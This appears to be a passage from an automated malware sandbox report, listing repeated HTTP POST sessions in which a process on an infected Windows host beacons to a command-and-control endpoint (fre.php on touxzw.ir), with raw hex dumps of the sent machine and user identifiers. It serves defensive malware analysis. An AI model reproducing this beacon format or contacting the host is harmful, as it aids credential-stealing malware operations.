                              server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1653&rtt_var=826&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.449735104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:43:21.766257048 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:43:21.771429062 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:43:22.574636936 CET840INHTTP/1.1 404 Not Found
                              Date: Thu, 20 Feb 2025 02:43:22 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Status: 404 Not Found
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EebD8zQDEF6DmQgpPZsFbuHFK0h8J99uqUNBiXEG9xEolG1yMrnac8C5RlDEY2D5lwGVQg7lNvS9rKDpKiA9rQRCL%2B3lLIx1byJkR8cyDkV%2B5gxc8oNOIPMWlzQ%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b260f8f17c477-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1699&min_rtt=1699&rtt_var=849&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              5192.168.2.449736104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:43:23.722965956 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:43:23.729996920 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:43:24.489306927 CET826INHTTP/1.1 307 Temporary Redirect
                              Date: Thu, 20 Feb 2025 02:43:24 GMT
                              Connection: close
                              Via: 1.0 middlebox
                              Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php
                              cf-cache-status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ds%2F7IBPDIRuNLIPDDh33Dg1htxdUCqfcwb%2FNYfpyDg%2Ba1nIYNjf%2FSSkDNhAyLB1hQNv16%2BShaLUMAENx6Nz%2BJ5vbQLaF6ruhKrhlbvcufnrpcU5XxFako1b3G4I%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b261bcd4243e8-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1748&min_rtt=1748&rtt_var=874&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              6192.168.2.449737104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:43:25.645998001 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:43:25.651125908 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:43:26.463025093 CET846INHTTP/1.1 404 Not Found
                              Date: Thu, 20 Feb 2025 02:43:26 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Status: 404 Not Found
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1MIw5l8tjXhoGM2wfeWHKuirceM8H4i2oB%2F9pa2YkhqyKcqj9VyZx%2BHMDuvoaUr5%2FhyDNN5oyfKtVLHZlf%2F1oK82kREFP4u0c%2FPXrSfX8HyJP7VA3paipI926Yw%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b2627fc2a43f8-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1733&min_rtt=1733&rtt_var=866&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              7192.168.2.449738104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:43:27.747466087 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:43:27.752712965 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:43:28.504662037 CET828INHTTP/1.1 307 Temporary Redirect
                              Date: Thu, 20 Feb 2025 02:43:28 GMT
                              Connection: close
                              Via: 1.0 middlebox
                              Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php
                              cf-cache-status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BkMutX6%2BH%2F8LrqZmd5FZXOcYPMJ1FqLCetrcJEGqL%2FoBj7CqXSPcaOEvsavN%2Fi93yIxZPd2zLPnJkf3OU%2BUtz%2FhFAzqosjvIfk9AR9jL9hBReETWSA8orFEqjWk%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b2634fb8b5e74-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1786&min_rtt=1786&rtt_var=893&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=110&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              8192.168.2.449741104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:43:29.654202938 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:43:29.660542965 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:43:30.375478983 CET824INHTTP/1.1 307 Temporary Redirect
                              Date: Thu, 20 Feb 2025 02:43:30 GMT
                              Connection: close
                              Via: 1.0 middlebox
                              Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php
                              cf-cache-status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AQM06%2BikAdI5ZS1bJ6M1vQEMiw4VxgQjSKdK1PMTHLAqUye4DiJCbnp0ObvE4JY%2B%2B9J7I%2F6rj0QbPkPbQ1Mit3pVMqmpv3PBgOiBBydb5JB%2Bxm1H7Zd3x9G2oRE%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b2640d949f5f8-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1848&min_rtt=1848&rtt_var=924&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=173&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              9192.168.2.449745104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:43:31.516771078 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:43:31.521909952 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:43:32.301815987 CET838INHTTP/1.1 404 Not Found
                              Date: Thu, 20 Feb 2025 02:43:32 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Status: 404 Not Found
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7t5gVaAOXgHqYf4VGzzJuqmIt26eofZ5Id5JZej4eB%2BOHVIEZAzzSzR84eqeViuAKvu92WZ6Zajrh5GQ0ndZ48LoBciu7aAA29uUVKRLzfWRzZA2y9tgVgVh4mg%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b264c7dd041e0-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1789&min_rtt=1789&rtt_var=894&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              10192.168.2.449747104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:43:33.451307058 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:43:33.456489086 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:43:34.207351923 CET826INHTTP/1.1 307 Temporary Redirect
                              Date: Thu, 20 Feb 2025 02:43:34 GMT
                              Connection: close
                              Via: 1.0 middlebox
                              Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php
                              cf-cache-status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DJFRqI%2B922YO%2B%2B9zgHGwV9of%2FajoAGUBWYjJypHMNp8aYlWyauf%2FoByT3wzpP2UFY%2BvWKYwjlSpHpDx8rw4T1G0Z3Xc5EPyiuHtAyr2ZLeUUiRvXCW4b20E1V7s%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b26589ca76a55-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1638&min_rtt=1638&rtt_var=819&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              11192.168.2.449748104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:43:35.358187914 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:43:35.363344908 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:43:36.139050007 CET822INHTTP/1.1 307 Temporary Redirect
                              Date: Thu, 20 Feb 2025 02:43:36 GMT
                              Connection: close
                              Via: 1.0 middlebox
                              Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php
                              cf-cache-status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C%2BnqIPk4kaoJl%2FhcJ6UN0XAWw0UvceBENEYuKs94G5yuuKShVGIL7G6WkT39u3ekd2AWi2syKFJUtpQiVXgP4j5av1z1Fi23EbxEg3ryPWRDHMVqUEq6JDmgjO8%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b26649deb72b9-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=20434&min_rtt=20434&rtt_var=10217&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              12192.168.2.449749104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:43:37.298062086 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:43:37.303124905 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:43:38.070710897 CET842INHTTP/1.1 404 Not Found
                              Date: Thu, 20 Feb 2025 02:43:38 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Status: 404 Not Found
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TP7OHEO2JtUGsJ0XGGVrj%2BK0RqAdfxHlxmK4%2BwcLdF1Pmfczu8COSzRuLp1sVuXeEG1bTkWmOXtn1Ss4U2x7CcRUQfswJ%2BDWR8VaKYl4mrBRvl926DtDDlAF87E%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b26709cf20f4a-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1671&min_rtt=1671&rtt_var=835&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              13192.168.2.449750104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:43:39.200334072 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:43:39.205647945 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:43:39.936440945 CET824INHTTP/1.1 307 Temporary Redirect
                              Date: Thu, 20 Feb 2025 02:43:39 GMT
                              Connection: close
                              Via: 1.0 middlebox
                              Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php
                              cf-cache-status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0wd7ndtfYxPR5lE9bwtM8t%2Fuv83GHmP%2FcBoCD36EvXUXdAmHI2r1X2cE4wTHwKLVzbkmtm7atB12ev8m%2BuF0f29j5pUabmpGE%2F9Y%2F0WKcOoUMX6qFuTSEeyuHyQ%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b267c7be24363-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1704&rtt_var=852&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              14192.168.2.449751104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:43:41.129297018 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:43:41.134380102 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:43:41.914738894 CET846INHTTP/1.1 404 Not Found
                              Date: Thu, 20 Feb 2025 02:43:41 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Status: 404 Not Found
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ONFE%2BPUUgf9QUkOAA0nbcXmN%2FsMlc2nlfcQhBH0YPe259Z7OXywIsCo%2Fl8Xwuj4VgVpOiE1%2Fdtx9KdR9s0Q4I6y7NKljBx1H%2BIim5zXg8u03ogufaOZS8EUob5g%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b26889fb24307-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1739&min_rtt=1739&rtt_var=869&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              15192.168.2.449752104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:43:43.085863113 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:43:43.094784021 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:43:43.907433033 CET849INHTTP/1.1 404 Not Found
                              Date: Thu, 20 Feb 2025 02:43:43 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Status: 404 Not Found
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pltY1NYLkBXdfg7CQ8noaPJWylUy%2BCzpEfN7uX8PNe7xiHl1thgqDgNigf9dP5n9yWnoo62JmuEo%2FvtD%2Boy9pxwww635m1DrAsC3guefusOr1m36de%2Fp%2F36ABL8%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b2694ed037d26-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=11004&min_rtt=11004&rtt_var=5502&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              16192.168.2.449753104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:43:45.097601891 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:43:45.102722883 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:43:45.838972092 CET822INHTTP/1.1 307 Temporary Redirect
                              Date: Thu, 20 Feb 2025 02:43:45 GMT
                              Connection: close
                              Via: 1.0 middlebox
                              Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php
                              cf-cache-status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FwF3voUK%2FN5%2BV2rA6TEePhjuERt4M6xHLyN8YpRPRRgIF1kU8mvDbmeMrWPjc9Zyb2wqFvE%2Bxt1tsp6miu9ELqCFv288Ke1sxgIsmJ6sFafIJg3KHRCL%2F8U7Dnw%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b26a15dcbde9a-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1724&min_rtt=1724&rtt_var=862&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              17192.168.2.449754104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:43:46.991051912 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
